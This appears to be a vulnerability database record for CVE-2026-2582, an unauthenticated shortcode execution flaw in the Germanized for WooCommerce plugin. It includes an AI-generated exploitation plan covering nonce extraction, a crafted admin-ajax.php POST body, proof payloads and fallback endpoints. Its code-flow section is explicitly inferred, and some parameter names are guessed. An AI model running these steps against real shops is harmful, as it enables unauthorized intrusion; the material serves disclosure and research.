[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKT-vbdjfaTo-ycFyop1uW4RYWFg6VBF1CwMg5Nw3SvY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"source_links":37},"CVE-2026-2582","germanized-for-woocommerce-unauthenticated-arbitrary-shortcode-execution","Germanized for WooCommerce \u003C= 3.20.5 - Unauthenticated Arbitrary Shortcode Execution","The Germanized for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution via the 'account_holder' parameter in all versions up to, and including, 3.20.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. 
This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","woocommerce-germanized",null,"\u003C=3.20.5","3.20.6","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Improper Control of Generation of Code ('Code Injection')","2026-04-13 17:42:17","2026-04-14 06:43:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9e6837ad-576f-4c25-9540-6144ddc8630e?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Flayout.scss","assets\u002Fjs\u002Fblocks\u002Fcart\u002Fslotfills.js","assets\u002Fjs\u002Fblocks\u002Fcheckout\u002Fcheckout-checkboxes\u002Fblock.json","assets\u002Fjs\u002Fblocks\u002Fcheckout\u002Fcheckout-photovoltaic-system-notice\u002Fblock.json","build\u002Fcart-style.asset.php","build\u002Fcart.asset.php","build\u002Fcart.js","build\u002Fcheckout-frontend.asset.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-2582 (Germanized for WooCommerce)\n\n## 1. Vulnerability Summary\nThe **Germanized for WooCommerce** plugin (versions \u003C= 3.20.5) is vulnerable to **Unauthenticated Arbitrary Shortcode Execution**. The vulnerability exists because the plugin accepts user-supplied input via the `account_holder` parameter (associated with the SEPA Direct Debit payment method) and processes this value using the `do_shortcode()` function without adequate sanitization or validation. This allows an unauthenticated attacker to execute any registered WordPress shortcode, potentially leading to information disclosure or further exploitation.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `woocommerce_update_order_review` (Standard WooCommerce AJAX action that the plugin hooks into to refresh payment information).\n*   **Vulnerable Parameter:** `account_holder` (often passed within the `post_data` string or as a direct POST parameter).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:**\n    1.  The \"Direct Debit\" (SEPA) payment method must be enabled in Germanized for WooCommerce settings.\n    2.  At least one product must be in the WooCommerce cart to access the checkout flow and trigger the `update_order_review` action.\n\n## 3. Code Flow\n1.  **Entry Point:** An AJAX request is sent to `admin-ajax.php` with the action `woocommerce_update_order_review`.\n2.  **Hook:** WooCommerce triggers the `update_order_review` logic, which in turn calls hooks for active payment gateways.\n3.  **Germanized Logic:** The `WC_GZD_Gateway_Direct_Debit` class (or similar) handles the Direct Debit fields. It retrieves the `account_holder` value from the `$_POST` request.\n4.  **Vulnerable Sink:** The plugin generates an HTML notice or a review summary for the payment method. It incorporates the `account_holder` value into a template string and passes that string through `do_shortcode()`.\n    *   *Inferred logic:* `echo do_shortcode( sprintf( __( 'Direct debit from %s', 'woocommerce-germanized' ), $_POST['account_holder'] ) );`\n5.  **Execution:** The WordPress shortcode parser executes any shortcodes found in the `account_holder` string.\n\n## 4. Nonce Acquisition Strategy\nThe `woocommerce_update_order_review` action requires a WooCommerce security nonce.\n\n1.  **Add Product to Cart:** First, a product must be added to the cart to ensure the checkout page is accessible.\n    *   `GET \u002F?add-to-cart=[PRODUCT_ID]`\n2.  **Navigate to Checkout:** Navigate to the `\u002Fcheckout\u002F` page.\n3.  
**Extract Nonce:** The nonce is localized by WooCommerce in the `wc_checkout_params` JavaScript object.\n    *   **JS Variable:** `window.wc_checkout_params?.update_order_review_nonce`\n4.  **Execution Agent Steps:**\n    *   `browser_navigate(\"\u002Fcheckout\u002F\")`\n    *   `NONCE = browser_eval(\"window.wc_checkout_params?.update_order_review_nonce\")`\n\n## 5. Exploitation Strategy\nThe exploit involves sending a specially crafted AJAX request to trigger the shortcode execution during the order review update.\n\n### Step 1: Data Preparation\n*   Identify a test product ID.\n*   Get the `update_order_review_nonce`.\n\n### Step 2: Construct Payload\n*   **Shortcode:** `[audio src=\"https:\u002F\u002Fexample.com\u002Fexploit.mp3\"]` (This is a safe, standard shortcode that renders an HTML5 audio tag, proving execution).\n*   **Alternative (Information Disclosure):** `[gallery]` or any shortcode that leaks content if applicable.\n\n### Step 3: Send Exploit Request\nUse the `http_request` tool to perform a POST request.\n\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=woocommerce_update_order_review\n    &security=[NONCE]\n    &payment_method=direct_debit\n    &account_holder=[audio src=\"https:\u002F\u002Fexample.com\u002Fexploit.mp3\"]\n    &post_data=billing_account_holder%3D%5Baudio+src%3D%22https%3A%2F%2Fexample.com%2Fexploit.mp3%22%5D%26payment_method%3Ddirect_debit\n    ```\n    *(Note: The parameter may be processed either from the top level or inside `post_data`. Including both ensures coverage.)*\n\n## 6. Test Data Setup\n1.  **Create Product:** `wp post create --post_type=product --post_title='Test Product' --post_status=publish`\n2.  
**Enable Gateway:** Ensure the Germanized Direct Debit gateway is active.\n    *   `wp option update woocommerce_direct_debit_settings '{\"enabled\":\"yes\"}'` (Note: Check the exact option name if this fails).\n3.  **Add to Cart:** `GET \u002F?add-to-cart=[PRODUCT_ID]`\n\n## 7. Expected Results\n*   The server will return a JSON object with a `fragments` key.\n*   The `fragments` HTML will contain the rendered output of the shortcode.\n*   For the `[audio]` shortcode, look for: `\u003Caudio class=\"wp-audio-shortcode\" ...>` or similar HTML tags in the response body.\n\n## 8. Verification Steps\n1.  **Analyze AJAX Response:** Use `http_request` and inspect the response body for the string `\u003Caudio`.\n2.  **Check for Non-Escaped Output:** Confirm that the shortcode characters `[` and `]` were not literally reflected, but replaced by their rendered HTML equivalent.\n\n## 9. Alternative Approaches\nIf `woocommerce_update_order_review` does not reflect the output, the vulnerability may be triggered on the final checkout submission:\n1.  **Action:** `wc-ajax=checkout`\n2.  **Payload:** Submit the checkout form with `billing_account_holder=[shortcode]`.\n3.  **Observation:** Check the resulting \"Thank You\" (Order Received) page for the rendered shortcode output. This page is usually at `\u002Fcheckout\u002Forder-received\u002F[ORDER_ID]\u002F`.\n\nIf `account_holder` is not the correct parameter name for the specific version, check for `billing_account_holder` or `sepa_account_holder`. 
The CVE description specifically points to `account_holder`.","gemini-3-flash-preview","2026-04-16 15:54:44","2026-04-16 15:55:33",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.20.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-germanized\u002Ftags\u002F3.20.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-germanized.3.20.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-germanized\u002Ftags\u002F3.20.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-germanized.3.20.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-germanized\u002Ftags"]